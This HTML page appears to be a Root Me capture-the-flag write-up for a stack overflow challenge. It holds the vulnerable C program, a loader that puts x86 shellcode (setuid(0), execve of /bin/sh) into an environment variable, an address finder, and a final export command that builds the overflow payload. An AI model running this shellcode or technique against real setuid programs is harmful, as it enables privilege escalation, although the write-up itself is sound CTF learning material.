<html>
 <head>
<title>Root me chall-4 </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div style="position: relative; background: url('http://hackerbuck.net23.net/css/bgm.png'); width: 1210px; height: 110px;">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Chall-4 </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Shellcode && env </h1>
   
 <br> 

<p>This problem took me around 1 month to solve :( ....</p>

<code>   #include <stdio.h>
    #include <stdlib.h>
    #include <dirent.h>
    #include <string.h>
     
    struct EnvInfo
    {
      char home[128];
      char username[128];
      char shell[128];  
      char path[128];  
    };
     
     
    struct EnvInfo GetEnv(void)
    {
      struct EnvInfo env;
      char *ptr;
     
      if((ptr = getenv("HOME")) == NULL)
        {
          printf("[-] Can't find HOME.\n");
          exit(0);
        }
      strcpy(env.home, ptr);
      if((ptr = getenv("USERNAME")) == NULL)
        {
          printf("[-] Can't find USERNAME.\n");
          exit(0);
        }
      strcpy(env.username, ptr);
      if((ptr = getenv("SHELL")) == NULL)
        {
          printf("[-] Can't find SHELL.\n");
          exit(0);
        }
      strcpy(env.shell, ptr);
      if((ptr = getenv("PATH")) == NULL)
        {
          printf("[-] Can't find PATH.\n");
          exit(0);
        }
      strcpy(env.path, ptr);
      return env;
    }
     
    int main(void)
    {
      struct EnvInfo env;
     
      printf("[+] Getting env...\n");
      env = GetEnv();
     
      printf("HOME     = %s\n", env.home);
      printf("USERNAME = %s\n", env.username);
      printf("SHELL    = %s\n", env.shell);
      printf("PATH     = %s\n", env.path);
     
      return 0;   
    }
</code>
<br>

<p> So this looks simple just set environment variable to overflow the buffer with a shellcode and get a shell !!! but the problem i faced is strcpy appends a <b> null 
    byte </b>to adress next to eip which is apparently the dest of an rep movs inst !!! so due to null-byte overflow our whole shellcode gets damaged !!! so solution to this is ..<br>
    create another env variable with shellcode <b>using a c code</b> and find it's addr and pass it in our 1'st env-var that's it !  </p>

<br>

<h2> C code for injecting shellcode into an env variable </h2><br>

<code>#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define NOP 0x90

char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
"\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
"\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

int main(void)
{
  char shell[512];
  puts("Eggshell loaded into environment.");
  //puts(strlen(shellcode));
  memset(shell,NOP,512);
  memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
  setenv("EGG", shell, 1);
  putenv(shell);
 system("bash");
  return(0); 
}</code>

<br>

<h2> C code for finding addr of injected Env-var </h2><br>

<code>#include <stdio.h>
#include <stdlib.h>
int main(void)
{
   printf("0x%lx\n", getenv("EGG"));
   return 0;
}</code>

<br>
<h2> So The final Exploit ....</h2> <br>
<code>
export USERNAME=$(python -c 'import struct ; print "\x90"*416+struct.pack("&ltI",0xbffffcae)+struct.pack("&ltI",0xbffff6a0)')
</code> 
<br>

<p>So the Username is filled with <b>(Nop_sled)*416+ &shellcode + &modifyaddr(addr of eip+4)</b></p>
</body>
</html>
